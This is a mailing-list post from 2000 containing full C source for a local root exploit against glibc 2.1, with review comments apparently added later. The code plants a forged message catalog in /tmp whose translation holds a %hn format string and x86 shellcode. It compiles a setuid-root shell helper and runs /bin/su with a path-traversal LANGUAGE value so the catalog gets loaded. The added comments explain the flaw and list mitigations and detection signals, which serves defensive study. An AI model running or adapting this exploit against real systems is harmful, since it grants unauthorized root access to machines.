glibc language
From: Maurycy Prodeus <z33d () ETH-SECURITY NET>
Date: Fri, 8 Sep 2000 00:00:45 +0200
/*
 * "I was drunk (...) she started pulling down her trousers, I didn't know
 *  what to do (...)"
 *   - greg () tenet pl -
 *
 * GLIBC 2.1 language exploit by z33d () eth-security net (C) 2000
 * with bypassing Solar Designer Stack Patch
 *
 * Dedicated to greg () tenet pl
 *
 * It doesn't work. ;> Try use gdb to find special value.
 * Tested on Debian 2.1/2.2 ziemniak
 * Greetz:
 *  - abusers from if.pwr.wroc.pl :))) (IF-NET)
 *  - y3t1, dyziu, team140 riders - Brunswick will be ours ... :)
 *  - lcamtuf - argante rulz :)
 *  - Sierota, blue eyes say it straight, an exceptionally active night yesterday...
 *    :))))))))))))))))))))))
 *  - secure () poz sm pl and #sigsegv in general
 *    funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ...
 *  - breslau killers with vx at the front :>
 *  - ppl from my so called real life
 *  - strawberry kefir
 * most code I ripped :>
 */

/*
 * NOTE(review): what this listing does, as far as its own code shows.
 *
 * It writes a gettext catalog (libc.po, compiled to libc.mo with msgfmt) into
 * /tmp/LC_MESSAGES whose msgstr for "%s: invalid option -- %c\n" is a
 * generated format string followed by raw machine code, then runs /bin/su
 * with LANGUAGE set to a value that walks out of the locale tree with "../"
 * components so that the catalog under /tmp is the one looked up. The
 * vulnerable program (su / the C library it links) is not part of this
 * listing, so the exact reason the translated string is later used as a
 * printf()-style format is not visible here; the defect class is "untrusted
 * message catalog honoured by a setuid program, translation used as a format".
 *
 * Defensive notes:
 *  - Setuid/setgid programs must not honour catalog-path environment
 *    variables (LANGUAGE, NLSPATH, LOCPATH, ...) from the caller; glibc now
 *    strips these from the environment of privileged (AT_SECURE) processes.
 *  - Compile-time format checks cannot see a format that arrives from a
 *    catalog at run time, so the guards are catalog trust (never load from a
 *    user-writable directory) and catalog validation: msgfmt -c /
 *    --check-format rejects a c-format translation whose conversions differ
 *    from the original's, which is exactly what the msgstr below does.
 *  - Fortified printf (_FORTIFY_SOURCE) refuses %n-family directives in
 *    format strings that live in writable memory, which covers the two %hn
 *    writes this payload relies on.
 *  - Detection: a LANGUAGE/LC_* value containing "/../", a fresh
 *    /tmp/LC_MESSAGES/*.mo, or a setuid binary opening a catalog outside the
 *    system locale directory are all strong local signals.
 *  - Code quality, left untouched because the code is kept byte-identical:
 *    memset()/memcpy() are used without <string.h> (implicit declarations),
 *    retloc is a long but read with "%x" and printed with "%x", error paths
 *    exit(0) (success status), and most return values (mkdir, chdir, system,
 *    open, fstat, lseek, write) are ignored.
 */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

/* Number of filler bytes appended after the two address pairs in buff. */
#define DEFAULT_ALIGNMENT 2
/* Earlier candidates for the write target, kept by the author for reference. */
// #define DEFAULT_RETLOC 0xbfffd2ff
// #define DEFAULT_RETLOC 0xbffff798
/* Default address the two %hn writes target; overridable via argv[1]. */
#define DEFAULT_RETLOC 0xbffff770
/* Size of buff1, the buffer that receives the generated format string. */
#define DEFAULT_BUFFER_SIZE 2048
/* Directory the forged catalog is written to; the LANGUAGE value below is
 * built to resolve into it. */
#define PATH "/tmp/LC_MESSAGES"

/* Bytes appended verbatim to the msgstr after the format string: a NOP run,
 * a marker ("dupaa"), and code ending in the path "/tmp/sh" (the helper
 * compiled further down). The author credits yeti for it. */
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"dupaa"
"\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80"
"\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh"; // very special shellcode, 15 min ;> big thanks to yeti

/* Source of the helper written to /tmp/sh.c and compiled to /tmp/sh: it
 * drops to uid/gid 0 and starts a shell, so it only does anything useful if
 * it is started from an already-privileged context. */
char sh[]=
"#include <stdlib.h>\n"
"#include <stdio.h>\n"
"#include <unistd.h>\n"
"int main(){\n"
"setuid(0);\n"
"setgid(0);\n"
"system(\"/bin/bash\");\n"
"}\n";

/*
 * Entry point.
 *
 * argv[1] (optional): write target address, parsed as hex (note: "%x" into a
 *                     long — only consistent where int and long have the same
 *                     width).
 * argv[2] (optional): number of "%.8x" conversions placed before the %hn
 *                     pair (the usage text says 118 < num < 140; default 132).
 *
 * Side effects: creates /tmp/LC_MESSAGES/libc.po and libc.mo, /tmp/sh.c and
 * /tmp/sh, invokes msgfmt and gcc via system(), and finally replaces the
 * process image with /bin/su. Returns 0 only if execle() fails.
 */
int main(int argc, char *argv[]) {
char *buff, *buff1, *ptr;
char *env[3];                       /* env[2] is never assigned; env[1] terminates */
long shell_addr,retloc=DEFAULT_RETLOC;
int align=DEFAULT_ALIGNMENT;
int bsize=DEFAULT_BUFFER_SIZE;
int i,reth,retl,num=132; // maybe 121
struct stat j;
FILE *fp;

if (argc > 1) sscanf(argv[1],"%x",&retloc);
if (argc > 2) num = atoi(argv[2]);
printf("Stay sharp ...\n");
printf("Usages: %s <RETloc> <num> (118<num<140)\n",argv[0]);
/* Both failure paths exit with status 0 (success). */
if (!(buff = malloc(1024))) { printf("Can't allocate memory.\n"); exit(0); }
if (!(buff1 = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); }
printf("Using RET location address: 0x%x\n", retloc);
/* Value the two half-word writes assemble at retloc. A low address with a
 * zero byte in it; where it points is not visible from this listing — the
 * author's comment only offers an alternative. */
shell_addr=0x00124270; // or 0x00124250
printf("Using Shellcode address: 0x%x\n", shell_addr);
/* Split into the high and low 16 bits, written separately by the two %hn. */
reth = (shell_addr >> 16) & 0xffff ;
retl = (shell_addr >> 0) & 0xffff ;
/* buff: "AAAA" + retloc (little-endian) + "AAAA" + retloc+2 (little-endian),
 * then `align` more 'A's. It is handed to su as a command-line argument. */
ptr = buff;
for (i = 0; i <2 ; i++, retloc+=2 ){
memset(ptr,'A',4); ptr += 4 ;
(*ptr++) = retloc & 0xff;
(*ptr++) = (retloc >> 8 ) & 0xff ;
(*ptr++) = (retloc >> 16 ) & 0xff ;
(*ptr++) = (retloc >> 24 ) & 0xff ;
}
memset(ptr,'A',align);
/* buff1: `num` copies of "%.8x" (each consumes one stack word and prints
 * exactly 8 characters, so num*8 characters are output so far) ... */
ptr = buff1;
for(i = 0 ; i < num ; i++ ) { memcpy(ptr, "%.8x", 4); ptr += 4; }
/* ... followed by "%<w1>c%hn%<w2>c%hn": w1 pads the running character count
 * to retl before the first %hn, w2 advances it (mod 0x10000) to reth before
 * the second. retl - num*8 is taken as unsigned, so a negative difference
 * wraps. The resulting conversions bear no relation to the msgid's %s/%c,
 * which is what msgfmt --check-format exists to catch. */
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8), (0x10000 + reth - retl));
/* Write the forged catalog source. mkdir/chdir results are not checked, so
 * on failure libc.po is created in the current directory instead. */
mkdir(PATH,0755);
chdir(PATH);
fp = fopen("libc.po", "w+");
if (!fp){ printf("Skript kidies ?\n"); exit(0); }
/* msgid is the untranslated getopt message; msgstr is the payload. The .po
 * carries no "#, c-format" flag, so msgfmt has nothing to check against. */
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s%s\\n\"", buff1,shellcode);
fclose(fp);
system("/usr/bin/msgfmt libc.po -o libc.mo");
/* Overwrite the last two bytes of libc.mo and extend it by four zero bytes.
 * Purpose is not stated; presumably to NUL-terminate/pad the string table
 * after the raw payload bytes — TODO confirm against the .mo layout.
 * open() is not checked; a failed open would pass -1 to fstat/lseek/write. */
i=open("/tmp/LC_MESSAGES/libc.mo",O_RDWR);
fstat(i,&j);
lseek(i,j.st_size-2,SEEK_SET);
write(i,"\0\0\0\0\0\0",6);
close(i);
/* Materialise and compile the helper referenced at the end of shellcode. */
fp = fopen("/tmp/sh.c","w+");
if (!fp){ printf("Skript kidies ?\n"); exit(0); }
fprintf(fp,"%s",sh);
fclose(fp);
system("cd /tmp;gcc sh.c -o sh");
/* Minimal environment for su: only LANGUAGE, pointing via "../" components
 * at /tmp so that /tmp/LC_MESSAGES/libc.mo is the catalog resolved. */
env[0] = "LANGUAGE=sk_SK/../../../../../../tmp";
env[1] = (char *)0 ;
/* "-u" is presumably not a valid su option, so su prints the translated
 * "invalid option" message; buff travels in as the next argument. Not
 * verifiable from this listing. */
execle("/bin/su","su","-u", buff, NULL,env);
perror("execle");   /* only reached if the exec itself fails */
return 0;
}
- z33d -
--
Freestate
Let yourself go
Let yourself go
Let your senses overflow
Step out of your cage
And onto the stage
It's time to start
Playing your part
Freedom awaits
Open the gates
Open your mind
Freedom's a state
/ Depeche Mode